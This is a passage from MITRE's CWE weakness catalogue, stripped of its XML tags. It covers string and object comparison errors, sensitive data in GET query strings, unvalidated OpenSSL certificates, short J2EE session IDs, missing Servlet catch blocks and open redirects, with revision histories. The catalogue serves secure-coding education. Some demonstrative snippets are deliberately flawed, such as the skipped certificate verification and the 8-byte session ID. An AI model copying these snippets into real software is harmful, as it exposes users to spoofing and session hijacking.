lastName;private Address address; + public Customer() {} + public Customer(String id, String firstName, String lastName) {...} + @Idpublic String getCustomerId() {...} + public void setCustomerId(String id) {...} + public String getFirstName() {...} + public void setFirstName(String firstName) {...} + public String getLastName() {...} + public void setLastName(String lastName) {...} + @OneToOne()public Address getAddress() {...} + public void setAddress(Address address) {...} + + + } + + However, the Customer Entity JavaBean is an unserialized object which can cause serialization failure and crash the application when the J2EE container attempts to write the object to the system. Session scoped objects must implement the Serializable interface to ensure that the objects serialize properly. + + public class Customer implements Serializable {...} + + + + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Persistence in J2EE Frameworks + + + + The product compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects. + For example, in Java, comparing objects using == usually produces deceptive results, since the == operator compares object references rather than values; often, this means that using == for strings is actually comparing the strings' references, not their values. + + + + + + + + + + + + Implementation + + + + + Other + Varies by Context + This weakness can lead to erroneous results that can cause unexpected application behaviors. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + In Java, use the equals() method to compare objects instead of the == operator. If using ==, it is important for performance reasons that your objects are created by a static factory, not by a constructor. + + + + + In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent. + + String str1 = new String("Hello");String str2 = new String("Hello");if (str1 == str2) {System.out.println("str1 == str2");} + + However, the if statement will not be executed as the strings are compared using the "==" operator. For Java objects, such as String objects, the "==" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method: + + if (str1.equals(str2)) {System.out.println("str1 equals str2");} + + + + In the following Java example, two BankAccount objects are compared in the isSameAccount method using the == operator. + + public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {return accountA == accountB;} + + Using the == operator to compare objects may produce incorrect or deceptive results by comparing object references rather than values. The equals() method should be used to ensure correct results or objects should contain a member variable that uniquely identifies the object. + The following example shows the use of the equals() method to compare the BankAccount objects and the next example uses a class get method to retrieve the bank account number that uniquely identifies the BankAccount object to compare the objects. + + public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {return accountA.equals(accountB);} + + + + + + EXP02-J + Use the two-argument Arrays.equals() method to compare the contents of arrays + + + EXP02-J + Use the two-argument Arrays.equals() method to compare the contents of arrays + + + EXP03-J + Do not use the equality operators when comparing values of boxed primitives + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2006-12-15 + Draft 5 + 2006-12-15 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Common_Consequences + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, References, Relationships, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Incorrect Object Comparison: Syntactic + Incorrect Syntactic Object Comparison + + + + This weakness has been deprecated. It was poorly described and difficult to distinguish from other entries. It was also inappropriate to assign a separate ID solely because of domain-specific considerations. Its closest equivalent is CWE-1023. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Content Team + MITRE + 2006-12-15 + Draft 5 + 2006-12-15 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Incorrect Object Comparison: Semantic + Incorrect Semantic Object Comparison + + + + The product uses the wrong operator when comparing a string, such as using "==" when the .equals() method should be used instead. + In Java, using == or != to compare two strings for equality actually compares two objects for equality rather than their string values for equality. Chances are good that the two references will never be equal. While this weakness often only affects program correctness, if the equality is used for a security decision, the unintended comparison result could be leveraged to affect program security. + + + + + + + + Implementation + + + + + Other + Other + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Within Java, use .equals() to compare string values. + Within JavaScript, use == to compare string values. + Within PHP, use == to compare a numeric value to a string value. (PHP converts the string to a number.) + + High + + + + + In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent. + + String str1 = new String("Hello");String str2 = new String("Hello");if (str1 == str2) {System.out.println("str1 == str2");} + + However, the if statement will not be executed as the strings are compared using the "==" operator. For Java objects, such as String objects, the "==" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method: + + if (str1.equals(str2)) {System.out.println("str1 equals str2");} + + + + In the example below, three JavaScript variables are declared and initialized with the same values. Note that JavaScript will change a value between numeric and string as needed, which is the reason an integer is included with the strings. An if statement is used to determine whether the values are the same. + + <p id="ieq3s1" type="text">(i === s1) is FALSE</p> + <p id="s4eq3i" type="text">(s4 === i) is FALSE</p> + <p id="s4eq3s1" type="text">(s4 === s1) is FALSE</p> + + var i = 65; + var s1 = '65'; + var s4 = new String('65'); + + if (i === s1) + { + document.getElementById("ieq3s1").innerHTML = "(i === s1) is TRUE"; + } + + if (s4 === i) + { + document.getElementById("s4eq3i").innerHTML = "(s4 === i) is TRUE"; + } + + if (s4 === s1) + { + document.getElementById("s4eq3s1").innerHTML = "(s4 === s1) is TRUE"; + } + + However, the body of the if statement will not be executed, as the "===" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. The types in the second are int and reference, so this one fails as well. The types in the third are reference and string, so it also fails. + While the variables above contain the same values, they are contained in different types, so the document.getElementById... statement will not be executed in any of the cases. + To compare object values, the previous code is modified and shown below to use the "==" for value comparison so the comparison in this example executes the HTML statement: + + <p id="ieq2s1" type="text">(i == s1) is FALSE</p> + <p id="s4eq2i" type="text">(s4 == i) is FALSE</p> + <p id="s4eq2s1" type="text">(s4 == s1) is FALSE</p> + + var i = 65; + var s1 = '65'; + var s4 = new String('65'); + + if (i == s1) + { + document.getElementById("ieq2s1").innerHTML = "(i == s1) is TRUE"; + } + + if (s4 == i) + { + document.getElementById("s4eq2i").innerHTML = "(s4 == i) is TRUE"; + } + + if (s4 == s1) + { + document.getElementById("s4eq2s1").innerHTML = "(s4 == s1) is TRUE"; + } + + + + + In the example below, two PHP variables are declared and initialized with the same numbers - one as a string, the other as an integer. Note that PHP will change the string value to a number for a comparison. An if statement is used to determine whether the values are the same. + + var $i = 65; + var $s1 = "65"; + + if ($i === $s1) + { + echo '($i === $s1) is TRUE'. "\n"; + } + else + { + echo '($i === $s1) is FALSE'. "\n"; + } + + However, the body of the if statement will not be executed, as the "===" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. + While the variables above contain the same values, they are contained in different types, so the TRUE portion of the if statement will not be executed. + To compare object values, the previous code is modified and shown below to use the "==" for value comparison (string converted to number) so the comparison in this example executes the TRUE statement: + + var $i = 65; + var $s1 = "65"; + + if ($i == $s1) + { + echo '($i == $s1) is TRUE'. "\n"; + } + else + { + echo '($i == $s1) is FALSE'. "\n"; + } + + + + + + EXP03-J + Do not use the equality operators when comparing values of boxed primitives + + + EXP03-J + Do not use the equality operators when comparing values of boxed primitives + + + EXP35-PL + Use the correct operator type for comparing values + CWE More Specific + + + SFP1 + Glitch in computation + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2006-12-15 + Draft 5 + 2006-12-15 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Erroneous String Compare + + + + The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request. + The query string for the URL could be saved in the browser's history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources. If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks. + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + At a minimum, attackers can garner information from query strings that can be utilized in escalating their method of attack, such as information about the internal workings of the application or database column names. Successful exploitation of query string parameter vulnerabilities could lead to an attacker impersonating a legitimate user, obtaining proprietary data, or simply executing actions not intended by the application developers. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + When sensitive information is sent, use the POST method (e.g. registration form). + + + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Description + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through GET Request + Information Leak Through Query Strings in GET Request + Information Exposure Through Query Strings in GET Request + + + + The product uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements. + This could allow an attacker to use an invalid certificate to claim to be a trusted host, use expired certificates, or conduct other attacks that could be detected if the certificate is properly validated. + + + + + + Implementation + + + + + Confidentiality + Read Application Data + The data read may not be properly secured, it might be viewed by an attacker. + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Trust afforded to the system in question may allow for spoofing or redirection attacks. + + + Access Control + Gain Privileges or Assume Identity + If the certificate is not checked, it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data under the guise of a trusted host. While the attacker in question may have a valid certificate, it may simply be a valid certificate for a different site. In order to ensure data integrity, we must check that the certificate is valid, and that it pertains to the site we wish to access. + + + + + Architecture and Design + Ensure that proper authentication is included in the system design. + + + Implementation + Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications. + + + + + The following OpenSSL code ensures that the host has a certificate. + + if (cert = SSL_get_peer_certificate(ssl)) { + + + // got certificate, host can be trusted + + + //foo=SSL_get_verify_result(ssl); + + + //if (X509_V_OK==foo) ... + + + } + + Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-295 and CWE-599 are very similar, although CWE-599 has a more narrow scope that is only applied to OpenSSL certificates. As a result, other children of CWE-295 can be regarded as children of CWE-599 as well. CWE's use of one-dimensional hierarchical relationships is not well-suited to handle different kinds of abstraction relationships based on concepts like types of resources ("OpenSSL certificate" as a child of "any certificate") and types of behaviors ("not validating expiration" as a child of "improper validation"). + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples, Description, Name, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + No OpenSSL Certificate Check Performed before Use + Trust of OpenSSL Certificate Without Validation + + + + The J2EE application is configured to use an insufficient session ID length. + If an attacker can guess or steal a session ID, then they may be able to take over the user's session (called session hijacking). The number of possible session IDs increases with increased session ID length, making it more difficult to guess or steal a session ID. + + + + + + + + + Session ID's can be used to identify communicating parties in a web environment. + The expected number of seconds required to guess a valid session identifier is given by the equation: (2^B+1)/(2*A*S) Where: - B is the number of bits of entropy in the session identifier. - A is the number of guesses an attacker can try each second. - S is the number of valid session identifiers that are valid and available to be guessed at any given time. The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier no matter the identifier's length. Assuming that the session identifiers are being generated using a good source of random numbers, we will estimate the number of bits of entropy in a session identifier to be half the total number of bits in the session identifier. For realistic identifier lengths this is possible, though perhaps optimistic. + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + If an attacker can guess an authenticated user's session identifier, they can take over the user's session. + + + + + Implementation + Session identifiers should be at least 128 bits long to prevent brute-force session guessing. A shorter session identifier leaves the application open to brute-force session guessing attacks. + + + Implementation + A lower bound on the number of valid session identifiers that are available to be guessed is the number of users that are active on a site at any given moment. However, any users that abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64 bit session identifier, assume 32 bits of entropy. For a large web site, assume that the attacker can try 1,000 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 4 minutes. Now assume a 128 bit session identifier that provides 64 bits of entropy. With a very large web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be guessed. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is greater than 292 years. + + + + + The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length. + + <sun-web-app> + ...<session-config> + <session-properties><property name="idLengthBytes" value="8"><description>The number of bytes in this web module's session ID.</description></property></session-properties> + </session-config>... + </sun-web-app> + + This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user's session. + Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits. + + + + + J2EE Misconfiguration: Insufficient Session-ID Length + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Background_Details, Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Other_Notes, References + + + CWE Content Team + MITRE + 2009-10-29 + updated Background_Details, Common_Consequences, Enabling_Factors_for_Exploitation, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The Servlet does not catch all exceptions, which may reveal sensitive debugging information. + When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. For example, a stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components. + + + + + + + + Missing Catch Block + + + + + Implementation + + + + + Confidentiality + Availability + Read Application Data + DoS: Crash, Exit, or Restart + + + + + Implementation + Implement Exception blocks to handle all types of Exceptions. + + + + + The following example attempts to resolve a hostname. + + protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println("hello " + addr.getHostName());} + + A DNS lookup failure will cause the Servlet to throw an exception. + + + + + ERR01-J + Do not allow exceptions to expose sensitive information + + + SFP4 + Unchecked Status Condition + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The "Missing Catch Block" concept is probably broader than just Servlets, but the broader concept is not sufficiently covered in CWE. + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Alternate_Terms, Description, Maintenance_Notes, Name, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Catch Block + Failure to Catch All Exceptions (Missing Catch Block) + Failure to Catch All Exceptions in Servlet + + + + A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. + An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. Whether this issue poses a vulnerability will be subject to the intended behavior of the application. For example, a search engine might intentionally provide redirects to arbitrary URLs. + + + + + + + + + + Phishing is a general term for deceptive attempts to coerce private information from users that will be used for identity theft. + + + + Open Redirect + + + Cross-site Redirect + + + Cross-domain Redirect + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Low + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data. + + + Access Control + Confidentiality + Other + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Other + The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site. + + + + + Manual Static Analysis + Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. + High + + + Automated Dynamic Analysis + Automated black box tools that supply URLs to every input may be able to spot Location header modifications, but test case coverage is a factor, and custom redirects may not be detected. + + + Automated Static Analysis + Automated static analysis tools may not be able to determine whether input influences the beginning of a URL, which is important for reducing false positives. + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Fuzz Tester + Framework-based Fuzzer + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + Use a list of approved URLs or domains to be used for redirection. + + + + Architecture and Design + Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page. + + + Architecture and Design + Enforcement by Conversion + + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability. + + + + Architecture and Design + Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330). + Note that this can be bypassed using XSS (CWE-79). + + + Architecture and Design + Implementation + Attack Surface Reduction + + Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. + Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields. + + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input 